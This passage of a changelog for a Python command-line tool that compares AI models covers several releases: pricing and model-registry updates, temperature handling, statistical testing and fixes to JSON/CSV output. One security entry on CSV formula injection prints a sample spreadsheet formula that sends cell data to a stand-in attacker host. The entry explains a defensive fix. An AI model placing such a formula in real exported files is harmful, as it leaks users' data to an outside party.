- **The `all` group excludes NVIDIA, and all nine READMEs now say so.** They described `all` as excluding local models and OpenRouter; `_resolve_all_cloud` excludes local, OpenRouter and NVIDIA. A user who configured `NVIDIA_API_KEY` and ran `--models all` got no NIM models and no explanation. The sentence now names all three and gives the reason in a clause.
|
|
691
|
+
|
|
692
|
+
- **The eight translations documented manual re-running instead of `--runs`.** They carried the pre-`--runs` advice to run the same comparison three to five times and look for patterns - wrong advice rather than missing advice, since the flag has done it automatically for several releases. Both bullets README.md documents it in are now translated, along with the coefficient-of-variation threshold, the `stats_by_cell` JSON key and the `--runs` plus `--check-hallucination` combination. `System requirements` is also translated rather than left English-only, so the note naming seven English-only sections is now accurate. `tests/test_readme_parity.py` pins all of it: the provider count, the temperature model list, every static group row, the date set and the heading structure are asserted against the registry across all nine files, so a fact can no longer drift in documentation while the code moves.
|
|
693
|
+
|
|
694
|
+
- **The READMEs now list every provider's environment variable and name the correct set of models that omit temperature.** The headless-Linux export block carried nine variables for eleven cloud providers - `ZAI_API_KEY` had been missing since Z.AI landed in 0.1.4 - and the comparison-methodology section listed nine models as omitting the temperature field when the registry has twelve, the three `gpt-5.6` variants added in 0.1.5 having gone unrecorded.
|
|
695
|
+
|
|
696
|
+
### Security
|
|
697
|
+
|
|
698
|
+
- `redact_secrets()` now removes `nvapi-` prefixed tokens. The `Authorization: Bearer`, `x-api-key:` and `api_key=` rules already caught it, because those match on the surrounding marker rather than on the key's shape, but a bare token quoted in a JSON error body carries no marker and nothing matched it. Redacted provider errors reach the `error` column of both CSV and JSON output, which CI pipelines commonly upload as an artifact, so the gap ended at a file people publish.
|
|
699
|
+
|
|
700
|
+
**Scope, stated precisely: this was not reachable at 0.1.5.** Nothing read `NVIDIA_API_KEY` - every `load_key()` and `is_key_configured()` call site is driven by `all_known_providers()`, which derives from `PRICING`, and no NVIDIA model was registered - so no `nvapi-` token could enter an error string through the tool. The gap was in the redaction table, not in a live path. It is fixed in the same release that makes it reachable, not after. The seven pre-existing prefix rules are unaffected and are now pinned to their exact output by a regression test, so a future pattern addition cannot silently swallow one into the wrong placeholder.
|
|
701
|
+
|
|
702
|
+
### Dependencies
|
|
703
|
+
|
|
704
|
+
- Widened `mistralai` from `>=2.4.7,<2.9.0` to `>=2.4.7,<2.10.0`. The 2.8 line is terminal - 2.8.0 was its only release - and this SDK ships forward-only generated releases without backports, so an upstream security patch would land at 2.9 or above and the old ceiling would have kept it from reaching users. 2.9.3 was run against the full suite. The floor stays at `2.4.7`: it excludes the withdrawn 2.4.6 release (GHSA-wx9m-wx4f-4cmg).
|
|
705
|
+
- Declared `numpy>=1.17` explicitly. It was already installed as a transitive dependency of `scipy`, but `run_statistics.py` imports it directly, so the import now rests on a declaration rather than on another package's requirements. The floor is what the code uses: `numpy.random.default_rng` and `Generator.integers` arrived in 1.17.0. No ceiling - no numpy release has broken this project.
|
|
706
|
+
|
|
707
|
+
## [0.1.5] - 2026-08-07
|
|
708
|
+
|
|
709
|
+
### Breaking
|
|
710
|
+
|
|
711
|
+
- **Removed the `all-fast` model group.** `--models all-fast` is no longer a group name; it now gives the same `Unknown model: all-fast` error as any unrecognised token. The seven models it contained are untouched - all remain in `PRICING` and can still be named individually - and no other group changed membership.
|
|
712
|
+
|
|
713
|
+
The reason is that the selection could not be defended. The seven were a curated one-model-per-provider pick, and this project has never measured latency, so the members were not chosen on any figure it can cite. Ranking each member against the other models from its own provider (blended input + output rate) shows the membership does not track price either: `claude-haiku-4-5` 1/10 and `deepseek-v4-flash` 1/2 are their provider's cheapest, but `glm-5-turbo` is 10th of 14, `gemini-3.5-flash` 5th of 6, and `llama-3.3-70b-versatile` is the **dearest** of Groq's four. Nor was the group simply "every model named fast": eight registered provider ids contain `flash`, `turbo`, `fast` or `instant` and were not in it, among them `gemini-2.5-flash`, `gemini-3.6-flash`, `glm-4.7-flash`, `glm-4.5-flash` and `qwen-flash`. Naming broke ties; it was not the rule. A group asserting a property the project cannot support is worse than no group, so it is withdrawn rather than redefined.
|
|
714
|
+
|
|
715
|
+
Removed outright rather than deprecated behind a warning. `RETIRED_MODELS` exists to prevent silent *substitution* - a retired id resolving to something else and billing at a different rate while the run appears to succeed - and there is no substitution risk here: the token stops resolving before any request is built. Nothing was added to `RETIRED_MODELS`; a group was withdrawn, not a model retired.
|
|
716
|
+
|
|
717
|
+
**What replaces it.** There is no drop-in group. The closest surviving group is `all-budget`, but it is not equivalent: it covers six of the seven providers, **drops Groq**, and **requires `OPENAI_API_KEY` and `MISTRAL_API_KEY` that `all-fast` did not** - so a user with exactly the keys `all-fast` needed gets `No API key configured for openai`. If you want what `all-fast` ran, name the models directly: `--models claude-haiku-4-5,gemini-3.5-flash,grok-4.20-0309-non-reasoning,deepseek-v4-flash,llama-3.3-70b-versatile,qwen3.6-flash,glm-5-turbo`.
|
|
718
|
+
|
|
719
|
+
**What you will see.** If your run previously failed for a missing key, the exit code is unchanged at `2` and only the message differs - the group aborted on the first missing credential before, and the token is unrecognised now. If your run previously **worked**, it now exits `2` where it exited `0`, so a script gating on a non-zero status fails immediately rather than silently. Note that a shell redirect such as `--output-format json > results.json` still creates the file, so a pipeline that uploads that artifact will publish an empty one.
|
|
720
|
+
|
|
721
|
+
### Added
|
|
722
|
+
|
|
723
|
+
- `RetiredModelError` and a `RETIRED_MODELS` map for model IDs a provider has retired. Resolution now fails with a message naming the suggested replacement and the retirement date, and never substitutes the replacement: silent substitution is the failure mode this prevents (xAI, for example, redirects retired slugs to `grok-4.3` and bills at `grok-4.3` rates, so a request appears to succeed while the reported cost is wrong by ~6x). The check sits in `get_provider_for_model()`, the single chokepoint every comparison, batch run and judge validation routes through before any request is built, and is repeated in the `pricing <model>` command, which reads `PRICING` directly.
|
|
724
|
+
- `gpt-5.6-sol` (5.00 / 30.00 / 0.50), `gpt-5.6-terra` (2.00 / 12.00 / 0.20) and `gpt-5.6-luna` (0.20 / 1.20 / 0.02), OpenAI's current line. All three carry `rejects_sampling_params` - each returns `400 Unsupported value: 'temperature' does not support 0 with this model. Only the default (1) value is supported.`, so without the flag every call would fail, exactly as the nine models in Fixed below did. `gpt-5.6-terra` is OpenAI's named replacement for `o4-mini`, which shuts down 2026-10-23 with its bare alias attached; `o4-mini` still works until then and is unchanged, as is its group membership. Prices are the standard short-context column - all three have a long-context tier above 272K, and `gpt-5.6-sol` doubles to 10.00 / 45.00 there. Verified 2026-08-07 by live call, one day after `PRICING_AS_OF`; the constant is deliberately not moved, since the rest of the registry was not re-verified on that date.
|
|
725
|
+
- `gemini-3.6-flash` (1.50 / 7.50 / 0.15), Google's recommended replacement for the removed `gemini-3-flash`.
|
|
726
|
+
- `claude-opus-5` (5.00 / 25.00 / 0.50) and `claude-sonnet-5` (3.00 / 15.00 / 0.30). Sonnet 5 stores Anthropic's list price; introductory pricing of 2.00 / 10.00 runs through 2026-08-31, with list pricing effective 2026-09-01.
|
|
727
|
+
- Cache-read rate for `gpt-5.3-codex` (0.175), which was missing.
|
|
728
|
+
- A group-membership invariant test: every member of every static group must be a live `PRICING` entry and must not be provider-retired. No test pinned group membership before now, which is why the dead `deepseek-reasoner` entry in `all-reasoning` survived a green suite.
|
|
729
|
+
- `tests/test_deepseek_provider.py`, covering provider identity, routing, cost, and that `_extra_create_kwargs()` stays an empty dict so no thinking-toggle reaches the wire.
|
|
730
|
+
- Dated deprecation comments next to `o4-mini`, `o3`, `o3-pro`, `gemini-2.5-flash`, `gemini-2.5-flash-lite` and `claude-haiku-4-5`, so the deadlines live in the code. No pricing or behavior change.
|
|
731
|
+
- A per-model `rejects_sampling_params` flag in `PRICING`, read through a new `rejects_sampling_params(model)` helper. Nine entries carry it - `gpt-5`, `gpt-5.5`, `o3`, `o4-mini`, `claude-opus-4-7`, `claude-opus-4-8`, `claude-opus-5`, `claude-sonnet-5` and `claude-fable-5` - and for those the Anthropic and OpenAI-compatible request builders omit `temperature` entirely. The direction of the default is deliberate: **absent means send.** Every other registry entry, every `local/` id, every OpenRouter passthrough id and every model added in future keeps receiving `temperature`. A newly-restricted model added without the flag therefore fails loudly with a 400 that names the parameter; under the opposite default it would quietly lose `temperature` with no error and nothing in the suite to catch it.
|
|
732
|
+
- `JudgeResult.degraded_models`, recording judges that ran at the provider default because they reject a temperature setting. Judging asks for `0.0` as before, but a flagged judge cannot honour it, so its scores are not reproducible run to run. The caveat is surfaced on all three output surfaces: a console note under the comparison table, a `(degraded: ...)` suffix on the Markdown Score cell, and a `judge_degraded` list per result in JSON.
|
|
733
|
+
- A `Temperature not applied` warning when a multi-value `--temperatures` sweep includes a model that omits the field, on both `compare` and `batch`. Every run of that model is an identical request rather than a sweep. It fires after group expansion, so it also covers the case where the user never typed the affected id - `--models all-premium --temperatures 0,0.5,1` names it explicitly.
|
|
734
|
+
- A mixed-sampling caveat on `compare`, for a significance run that compares a model which omits `temperature` against one that honours it. The two groups are sampled under different conditions, so the p-value can be reporting that rather than model quality. It fires whenever a verdict will actually be computed - including on the default invocation, `--models a,b --runs 10`, where `--significance` was never typed and auto-enables. That was the gap: the existing sweep warning covers only multi-value `--temperatures`, so the single-temperature case produced a statistical verdict with no signal anywhere. Where both caveats apply, they are **merged into one panel** carrying both messages rather than either suppressing the other; the sweep warning is unchanged everywhere it fires today. `batch` is unaffected - it has no `--runs` and no `--significance`, so it never computes a verdict to caveat.
|
|
735
|
+
- A top-level `significance_temperature_mixed` boolean in JSON output, the machine-readable half of that caveat: a script reading `--output-format json` otherwise gets a p-value with no indication the samples were incomparable. Like `models_without_temperature` it is always present, top level (**not** in the `methodology` block, which is gated on `--runs > 1`), and it is `false` from `batch`, which cannot mix a verdict. `CSV_COLUMNS` is unchanged.
|
|
736
|
+
- A top-level `models_without_temperature` key in JSON output, listing the models in that run whose `temperature` was omitted. Top level, **not** inside the `methodology` block, which is emitted only when `--runs > 1`. The key is always present and is an empty list when no such model ran. **CSV output carries no equivalent signal:** its `temperature` column records the value requested, not the value applied, and `CSV_COLUMNS` is unchanged this release.
|
|
737
|
+
|
|
738
|
+
### Changed
|
|
739
|
+
|
|
740
|
+
- Corrected `mistral-small-latest` to 0.15 / 0.60. The alias now resolves to Mistral Small 4; the previous 0.10 / 0.30 understated cost in both `all-budget` and `all-cheap`.
|
|
741
|
+
- `all-reasoning` now uses `deepseek-v4-pro` in place of the retired `deepseek-reasoner`. DeepSeek exposes reasoning as a mode rather than a separate model; Pro is the stronger of the two V4 models and Flash already fills the DeepSeek slot in `all-budget`, `all-fast` and `all-cheap`. Synced the group table across the README and all 8 translations.
|
|
742
|
+
- Re-verified provider pricing against first-party pages (2026-07-29) and bumped `PRICING_AS_OF` to 2026-07-29. One exception: the Z.AI/GLM block was not part of that pass and keeps its own earlier `2026-06-22` verification date in `pricing.py`; its 14 entries are unchanged since then.
|
|
743
|
+
- `all-open-weight` now uses the Groq-served `openai/gpt-oss-120b` and `openai/gpt-oss-safeguard-20b` in place of the removed `gpt-oss-120b` and `gpt-oss-20b`. The group keeps four members and every one of them is callable. **This changes which credential the group needs:** the removed entries were openai-provider, the replacements are groq-provider, so `--models all-open-weight` now requires `GROQ_API_KEY` for two slots that previously used `OPENAI_API_KEY`. Synced the group table across the README and all 8 translations.
|
|
744
|
+
- The module docstring and the eight per-provider section comments in `pricing.py` still read "Verified 2026-06-22" after `PRICING_AS_OF` was bumped. The docstring and those eight now read 2026-07-29; the ninth section comment, Z.AI's, keeps its own earlier date by design - see the note beside it in `pricing.py`.
|
|
745
|
+
|
|
746
|
+
### Removed
|
|
747
|
+
|
|
748
|
+
- `deepseek-chat` and `deepseek-reasoner`, retired by DeepSeek on 2026-07-24. Both are in `RETIRED_MODELS`.
|
|
749
|
+
- `grok-4.1-fast`, retired by xAI on 2026-05-15 and absent from its current pricing page. In `RETIRED_MODELS`.
|
|
750
|
+
- `mistral-medium-3.5`, a duplicate of `mistral-medium-latest` at the same price and not an ID Mistral documents. Deliberately not in `RETIRED_MODELS` - it was never provider-retired, so "Unknown model" is the accurate error.
|
|
751
|
+
- `gemini-3-flash`, whose ID and price were both wrong (the real ID is `gemini-3-flash-preview`; the stored 0.30 / 2.50 was `gemini-2.5-flash`'s rate). Also not in `RETIRED_MODELS`, for the same reason.
|
|
752
|
+
- `get_pricing()` from `pricing.py`, along with a dead branch in the judge Score-column renderer. It had no callers in `src/` and, unlike every live resolution path, did not check `RETIRED_MODELS` - a retired ID returned `None` rather than raising. It was never exported in `__init__.py`, but `from cli_modelarium.pricing import get_pricing` no longer resolves.
|
|
753
|
+
- `gpt-5.5-pro`, `gpt-5.4-pro`, `gpt-5.3-codex`, `gpt-5.3-codex-spark`, `gpt-oss-120b` and `gpt-oss-20b`, none of which are callable on the chat-completions endpoint this tool uses. Some are Responses-API-only; the rest were registered under ids this tool cannot call on that endpoint. Deliberately **not** in `RETIRED_MODELS`, for the same reason as `mistral-medium-3.5` and `gemini-3-flash` above: none was retired by its provider, so "Unknown model" is the accurate error and a retirement message naming a replacement would be false. Note that `gpt-5.3-codex` gained a cache-read rate earlier in this same release; correcting a price and then removing the entry in one release is deliberate - the rate was wrong and the model was never reachable - not thrash.
|
|
754
|
+
|
|
755
|
+
### Fixed
|
|
756
|
+
|
|
757
|
+
- Nine models could not be called at all. Any request carrying a non-default `temperature` came back 400, and `compare`/`batch` always send one, so `claude-opus-5`, `claude-sonnet-5`, `claude-opus-4-8`, `claude-opus-4-7`, `claude-fable-5`, `gpt-5`, `gpt-5.5`, `o3` and `o4-mini` failed every time - including as judges, and including through the `all`, `all-premium` and `all-flagship` groups. Omitting the field is the documented way to call them, and that is what now happens.
|
|
758
|
+
- **Exit codes on existing CI pipelines will move as a result.** A batch suite whose assertions could not run because the model returned 400 exits `2` today; from this release those assertions actually execute and the suite exits `0` or `1` on their real outcome. A previously-red pipeline may go green, or may fail on assertions for the first time. That is the intended fix, but a green-to-red flip reads like a regression to anyone who has not read this note.
|
|
759
|
+
- Worth knowing where the caveat bites hardest: `--significance` is the one place it can change a *conclusion* rather than a label. Comparing a model that omits `temperature` against one that honours it produces a variance difference that is a sampling artifact, and Welch or Mann-Whitney will report it as though it were a model-quality difference. That case now has a signal on both surfaces - see the mixed-sampling caveat below - where previously it had none, because the sweep warning fires only on multi-temperature runs and the dangerous invocation is the single-temperature default.
|
|
760
|
+
- **Human output no longer shares stdout with a machine payload.** `--output-format json|csv` writes to stdout, but so did the progress bar, the `Running batch:` line, the run summary, the judge ToS panel and six other sites - none of them gated on the output format. JSON raised on the extra bytes; CSV was worse, because `csv.reader` silently read a contaminating line as the header (one column instead of 21) or as an extra data row, and raised nothing. `compare` was affected too, not only `batch`: `--judge` prints the ToS panel unless `--no-judge-tos` is passed, so the default judging path corrupted the payload at any terminal width. Fixed as a scope rule rather than a list of sites - when there is no `--output` file and the format is `json` or `csv`, the command binds a stderr console for its whole body, so every site inherits it, including any added later. Two earlier attempts at this enumerated the sites and missed some both times. **The progress output is moved, not suppressed:** it is still there on stderr for anyone watching a long batch run.
|
|
761
|
+
- **Rich no longer reflows the serialized payload.** The JSON and CSV stdout branches went through `console.print()`, which wraps at the terminal width - so any response longer than the terminal corrupted the payload, and `jq` failed with `Invalid string: control characters from U+0000 through U+001F must be escaped`. This passed on a wide developer terminal and failed at the 80 columns CI defaults to. The payload is now written straight to `sys.stdout.buffer` as UTF-8, bypassing Rich entirely: wrapping is only one of three ways it mutates a payload, alongside consuming square-bracket markup and colouring numbers and URLs. Writing bytes rather than text also keeps the stdout stream byte-identical to the `--output` file on Windows, where text mode would translate the line endings.
|
|
762
|
+
|
|
763
|
+
These two were independent: fixing either one left the other. `--output FILE` was never affected and is unchanged.
|
|
764
|
+
|
|
765
|
+
**Behaviour change for existing scripts.** Anyone working around the old output - stripping the first two lines before parsing, say - will now strip two lines of valid payload. The workaround should be removed rather than kept.
|
|
766
|
+
|
|
767
|
+
### Security
|
|
768
|
+
|
|
769
|
+
- **CSV formula injection.** A cell whose value began with `=`, `+`, `-`, `@`, tab, carriage return or line feed was written verbatim, and spreadsheet applications evaluate such a cell as a formula rather than reading it as text. A model response of `=HYPERLINK("http://evil.example/?d="&A2,"Click")` therefore became a live exfiltration link the moment `results.csv` was opened in Excel, Google Sheets or LibreOffice. Reachable two ways: through model output, which is the least controlled content in the system, and through the batch file's `id` field, which becomes the `prompt_id` column and needs no model cooperation at all. All six text columns were affected - `prompt_id`, `prompt`, `system`, `model`, `output`, `error` - and `prompt_id` and `model` had never passed through any escaping helper. Values beginning with one of the seven characters are now prefixed with an apostrophe, which spreadsheets treat as a text marker. The escaping sits at the field-write boundary inside `_format_csv`, so it covers every column including any added later, and JSON and Markdown are deliberately untouched: JSON has no formula-injection problem and Markdown needs a different mitigation. Full-width variants (`=` `+` `-` `@`), which OWASP notes are interpretable as formulas in some locales, are **not** covered.
|
|
770
|
+
- The transform is not perfectly invertible. A value that legitimately begins with an apostrophe is indistinguishable from an escaped one, so a consumer that strips a leading apostrophe unconditionally will corrupt it.
|
|
771
|
+
- **`prompt_id` now differs between CSV and JSON.** Because the escaping lives inside the CSV formatter and JSON is deliberately left alone, a `prompt_id` beginning with one of the seven characters reads as `-baseline` in JSON and `'-baseline` in CSV. `prompt_id` is the natural join key - it is user-chosen through the batch file's `id`, uniqueness is enforced, and the README's own examples use semantic ids like `math-1` - so a consumer correlating the two formats, or joining a CSV back to its source batch file, would silently fail to match. It only bites when an id begins with one of the seven characters, and `-baseline` is not exotic.
|
|
772
|
+
|
|
773
|
+
### Dependencies
|
|
774
|
+
|
|
775
|
+
- Widened `mistralai` from `~=2.4.7` to `>=2.4.7,<2.9.0`, so the 2.5 through 2.8 minor series are allowed and an upstream security patch can be received without an emergency release. The floor stays at `2.4.7` deliberately: it excludes the compromised 2.4.6 release (GHSA-wx9m-wx4f-4cmg), and 2.4.7 is also the first mistralai release carrying signed publish attestations. All fifteen versions in the new range were run against the full suite.
|
|
776
|
+
- Tightened the `ruff` dev constraint from `~=0.15` to `~=0.16.0`. This is a ceiling tightening as much as an upgrade: two-component `~=0.15` allowed anything below `1.0`, while three-component `~=0.16.0` means `<0.17`.
|
|
777
|
+
|
|
778
|
+
## [0.1.4] - 2026-06-22
|
|
779
|
+
|
|
780
|
+
### Added
|
|
781
|
+
|
|
782
|
+
- DashScope (Alibaba Model Studio, International/Singapore endpoint) provider with 6 Qwen models (qwen3.7-max, qwen3.7-plus, qwen3.6-flash, qwen3.6-plus, qwen-flash, qwen3-coder-plus). Uses `DASHSCOPE_API_KEY`. Sends `enable_thinking=false` so costs reflect non-thinking rates. Added an `_extra_create_kwargs()` hook to the OpenAI-compatible base (default no-op) to support this.
|
|
783
|
+
- `--models all` now resolves to every cloud model with a configured API key (excludes local and OpenRouter); `--models all-local` resolves to the models reported by a running local server, with a clear message when none is reachable. Previously these tokens errored with "Unknown model."
|
|
784
|
+
- Documented the model-group shortcuts (static groups + `all`/`all-local`) in the README.
|
|
785
|
+
- Added Python 3.14 to the tested CI matrix (the 3.14 classifier was already declared; CI now exercises it). Minimum supported version remains 3.11.
|
|
786
|
+
- Z.AI/GLM provider (Zhipu AI, OpenAI-compatible overseas endpoint) with 14 GLM text models (glm-5.2, glm-5.1, glm-5, glm-5-turbo, glm-4.7, glm-4.7-flash, glm-4.7-flashx, glm-4.6, glm-4.5, glm-4.5-air, glm-4.5-x, glm-4.5-airx, glm-4.5-flash, glm-4-32b-0414-128k), including the free glm-4.7-flash / glm-4.5-flash. Uses `ZAI_API_KEY`; reuses the existing OpenAI-compatible stack (no new dependency).
|
|
787
|
+
- Current Claude models: claude-fable-5 (new frontier tier), claude-opus-4-8 (recommended Opus flagship), claude-opus-4-5, claude-sonnet-4-5. The `all-premium` / `all-flagship` groups now point at claude-opus-4-8.
|
|
788
|
+
- Added Z.AI/GLM and Alibaba/Qwen models to the static model groups: `all-premium`/`all-flagship` (qwen3.7-max, glm-5.2), `all-budget` (qwen3.7-plus, glm-4.5-air), `all-fast` (qwen3.6-flash, glm-5-turbo), `all-cheap` (qwen-flash, glm-4.7-flashx), and glm-5.2 in `all-reasoning`. Qwen is intentionally excluded from `all-reasoning`: the DashScope provider sends `enable_thinking=false`, so a Qwen model there would run non-thinking; glm-5.2 reasons by default through the Z.AI provider.
|
|
789
|
+
|
|
790
|
+
### Changed
|
|
791
|
+
|
|
792
|
+
- Corrected pricing to first-party provider rates (OpenAI o3/o3-pro/gpt-5.4-pro + cached rates; Google Gemini flash/flash-lite; Mistral medium/small; Groq gpt-oss/llama-4-scout; DeepSeek v4-pro/v4-flash/chat/reasoner).
|
|
793
|
+
- Corrected `gemini-3.1-pro` pricing to first-party rates (2.00/12.00/0.20) and renamed it to `gemini-3.1-pro-preview` to match the live API model id (the Gemini provider sends the id verbatim).
|
|
794
|
+
- Corrected `grok-4.20` and `grok-4.20-multi-agent` pricing to first-party rates (1.25/2.50) and updated their model ids to the live dated strings (`grok-4.20-0309-non-reasoning`, `grok-4.20-multi-agent-0309`).
|
|
795
|
+
- Repaired static model groups: replaced retired `grok-4.1-fast` (all-budget/all-fast) with `grok-4.20-0309-non-reasoning` and removed it from all-cheap; replaced `gemini-3-flash` with `gemini-3.5-flash` in all-fast. (`deepseek-reasoner` in all-reasoning is intentionally retained this release; its swap to a confirmed thinking-capable v4 id is deferred pending a live check before its 2026-07-24 deprecation.)
|
|
796
|
+
- Added OpenAI cache-read rates (`gpt-5`, `gpt-4.1-mini`, `gpt-4o`, `gpt-4o-mini`).
|
|
797
|
+
- Synced the README and all 8 translations to the current model groups, provider list, and pricing date; tightened the local-server ("running on localhost") and per-call model-selection feature descriptions for accuracy.
|
|
798
|
+
- Re-verified all provider pricing against first-party pages (2026-06-22). Bumped `PRICING_AS_OF` to 2026-06-22.
|
|
799
|
+
|
|
800
|
+
### Fixed
|
|
801
|
+
|
|
802
|
+
- The Google provider now also accepts `GEMINI_API_KEY` (the documented alias was previously ignored; only `GOOGLE_API_KEY` was read). `GOOGLE_API_KEY` still takes precedence.
|
|
803
|
+
|
|
804
|
+
### Dependencies
|
|
805
|
+
|
|
806
|
+
- No dependency changes.
|
|
807
|
+
|
|
808
|
+
## [0.1.3] - 2026-05-28
|
|
809
|
+
|
|
810
|
+
### Added
|
|
811
|
+
|
|
812
|
+
- Bootstrap confidence intervals on per-cell means via `scipy.stats.bootstrap`. Auto-enabled when `--runs > 1`.
|
|
813
|
+
- New CLI flags on `compare`:
|
|
814
|
+
- `--confidence-intervals` / `--no-confidence-intervals` (auto-enabled with `--runs > 1`)
|
|
815
|
+
- `--ci-level FLOAT` (default `0.95`)
|
|
816
|
+
- `--ci-method {bca,percentile,basic}` (default `bca` - publication-grade)
|
|
817
|
+
- `--bootstrap-resamples INT` (default `5000`, min `100`)
|
|
818
|
+
- `--bootstrap-seed INT` (required for reproducible CIs)
|
|
819
|
+
- New test choices on `--significance-test`:
|
|
820
|
+
- `paired-t` - paired t-test via `scipy.stats.ttest_rel` (more statistical power for same-prompt comparisons)
|
|
821
|
+
- `wilcoxon-signed` - Wilcoxon signed-rank via `scipy.stats.wilcoxon` (non-parametric paired)
|
|
822
|
+
- McNemar's test for paired binary outcomes. Auto-triggers when `--check-hallucination` is set with `--runs > 1` and 2+ models. Uses exact binomial test (`scipy.stats.binomtest`) for small discordant counts or Edwards continuity-corrected chi-square (`scipy.stats.chi2.sf`) for larger samples - NOT `scipy.stats.chi2_contingency` on the full 2×2 table (which would compute a test of independence, not McNemar).
|
|
823
|
+
- Bootstrap CIs on Cohen's d effect sizes via paired/independent bootstrap.
|
|
824
|
+
- `mcnemar_tests` array in JSON output when applicable.
|
|
825
|
+
- `methodology` block in JSON output recording bootstrap parameters, scipy version, and seed for reproducibility.
|
|
826
|
+
- Additive CI columns in CSV output (`latency_ms_ci_low`, `latency_ms_ci_high`, etc.) when CIs are enabled.
|
|
827
|
+
- Additive Markdown sections: "Bootstrap confidence intervals", "Statistical significance tests", "Binary outcome significance (McNemar)", "Statistical methodology".
|
|
828
|
+
- New public functions in `cli_modelarium.run_statistics`:
|
|
829
|
+
- `ConfidenceInterval`, `McNemarResult` dataclasses
|
|
830
|
+
- `bootstrap_ci()` - thin scipy wrapper with degenerate-data handling
|
|
831
|
+
- `paired_t_test()`, `wilcoxon_signed_rank()`
|
|
832
|
+
- `mcnemar_test()` - Edwards-corrected or exact binomial McNemar
|
|
833
|
+
- `compute_significance_with_ci()` - like `compute_pairwise_significance` plus CIs on Cohen's d
|
|
834
|
+
- `compute_stats_with_cis()` - CIs on per-model metric means
|
|
835
|
+
- `compute_mcnemar_pairwise()` - pairwise McNemar over hallucination pass/fail
|
|
836
|
+
- New private helpers ensuring paired tests align by `run_index` even when failures are asymmetric:
|
|
837
|
+
- `_extract_paired_metric_samples()`
|
|
838
|
+
- `_align_paired_samples()`
|
|
839
|
+
|
|
840
|
+
### Changed
|
|
841
|
+
|
|
842
|
+
- `SignificanceResult` dataclass extended with seven optional fields (all default `None`): `bootstrap_ci_low`, `bootstrap_ci_high`, `bootstrap_method`, `bootstrap_resamples`, `bootstrap_seed`, `effect_size_ci_low`, `effect_size_ci_high`. v0.1.2-style positional instantiation continues to work unchanged.
|
|
843
|
+
- Output formatters extended so CSV, Markdown, and JSON all receive significance, CI, McNemar, and methodology data (previously only JSON received significance results - a v0.1.2 wiring gap).
|
|
844
|
+
- `_emit_batch_results` threads the new parameters into every formatter branch.
|
|
845
|
+
|
|
846
|
+
### Dependencies
|
|
847
|
+
|
|
848
|
+
- No new runtime dependencies (uses scipy 1.17 already in v0.1.2).
|
|
849
|
+
- `NOTICE` unchanged - scipy is already attributed.
|
|
850
|
+
- Python version unchanged (still `>=3.11` from v0.1.2).
|
|
851
|
+
|
|
852
|
+
## [0.1.2] - 2026-05-28
|
|
853
|
+
|
|
854
|
+
### ⚠️ Breaking Changes
|
|
855
|
+
|
|
856
|
+
- **Minimum Python version is now 3.11** (was 3.10).
|
|
857
|
+
- Reason: scipy 1.17+ is a new runtime dependency for statistical significance testing, and scipy 1.17 requires Python 3.11+.
|
|
858
|
+
- Python 3.10 users can continue using cli-modelarium v0.1.1, which remains available on PyPI.
|
|
859
|
+
- Python 3.10 reaches end-of-life in October 2026.
|
|
860
|
+
|
|
861
|
+
### Added
|
|
862
|
+
|
|
863
|
+
- Pairwise statistical significance testing on the `compare` command. Auto-enabled when `--runs > 1` with 2+ models.
|
|
864
|
+
- New CLI flags on `compare`:
|
|
865
|
+
- `--significance` / `--no-significance` (auto-enabled with `--runs > 1` and 2+ models)
|
|
866
|
+
- `--significance-threshold FLOAT` (default: `0.05`)
|
|
867
|
+
- `--significance-test {welch,mann-whitney}` (default: `welch`)
|
|
868
|
+
- `--correction {none,bonferroni,holm}` (default: `bonferroni`)
|
|
869
|
+
- `--significance-metric {score,latency_ms,output_tokens,cost_usd}` (default: `score` when judging, else `latency_ms`)
|
|
870
|
+
- Welch's t-test via `scipy.stats.ttest_ind(equal_var=False)`.
|
|
871
|
+
- Mann-Whitney U test via `scipy.stats.mannwhitneyu` with continuity correction.
|
|
872
|
+
- Cohen's d effect size with conventional interpretation bands (`negligible` / `small` / `medium` / `large`), implemented in pure stdlib.
|
|
873
|
+
- Bonferroni and Holm-Bonferroni multiple-comparison corrections, implemented in pure stdlib with monotone enforcement.
|
|
874
|
+
- JSON output now includes a `significance_tests` array when significance testing was performed. When significance is disabled or trivially absent, the JSON schema is unchanged (additive only).
|
|
875
|
+
- Display strategy: single-line summary for 2 models, matrix table for 3-5 models, top-K significant pairs for 6+ models (full matrix available in JSON).
|
|
876
|
+
- New functions in `cli_modelarium.run_statistics`:
|
|
877
|
+
- `SignificanceResult` dataclass
|
|
878
|
+
- `compute_pairwise_significance()`
|
|
879
|
+
- `welch_t_test()`, `mann_whitney_u_test()`
|
|
880
|
+
- `cohens_d()`, `cohens_d_interpretation()`
|
|
881
|
+
- `bonferroni_correct()`, `holm_correct()`
|
|
882
|
+
|
|
883
|
+
### Changed
|
|
884
|
+
|
|
885
|
+
- `pyproject.toml`: `requires-python` bumped to `>=3.11`.
|
|
886
|
+
- `pyproject.toml`: classifiers updated - removed Python 3.10, added 3.13 and 3.14.
|
|
887
|
+
- `pyproject.toml`: `[tool.ruff].target-version` bumped to `py311`.
|
|
888
|
+
- `NOTICE`: added attributions for scipy, numpy, and the bundled native libraries (OpenBLAS, LAPACK, libquadmath).
|
|
889
|
+
- README: new "System Requirements" section and statistical-significance documentation.
|
|
890
|
+
|
|
891
|
+
### Fixed
|
|
892
|
+
|
|
893
|
+
- Resolved a latent inconsistency: `tests/test_jsonschema_optional.py` already imported `tomllib` (Python 3.11+ stdlib only) while the project declared 3.10 support. The Python bump retroactively fixes this.
|
|
894
|
+
|
|
895
|
+
### Dependencies
|
|
896
|
+
|
|
897
|
+
- Added: `scipy>=1.17,<2.0` (pulls `numpy>=1.26.4` as a transitive dependency).
|
|
898
|
+
|
|
899
|
+
## [0.1.1] - 2026-05-27
|
|
900
|
+
|
|
901
|
+
### Added
|
|
902
|
+
|
|
903
|
+
- `--runs N` flag on the `compare` command for statistical reproducibility analysis. Runs each (model, temperature, system_prompt) combination N times (1-100) and displays mean/median/stdev/CV of timing and tokens, cost totals, output frequency analysis, mode output, and output diversity.
|
|
904
|
+
- `--show-all-runs` flag to override the auto-collapse heuristic when many concurrent display panels would be created.
|
|
905
|
+
- New module `src/cli_modelarium/run_statistics.py` with `RunStats` dataclass and `compute_run_stats()` function for pure-stdlib statistical analysis.
|
|
906
|
+
- Hallucination rate calculation when `--check-hallucination` is combined with `--runs N`. Reports "N of M runs flagged as High risk" with the aggregate hallucination rate.
|
|
907
|
+
- Cost warning when `--runs N` is used without `--max-cost` (helps prevent unexpected spend).
|
|
908
|
+
|
|
909
|
+
### Changed
|
|
910
|
+
|
|
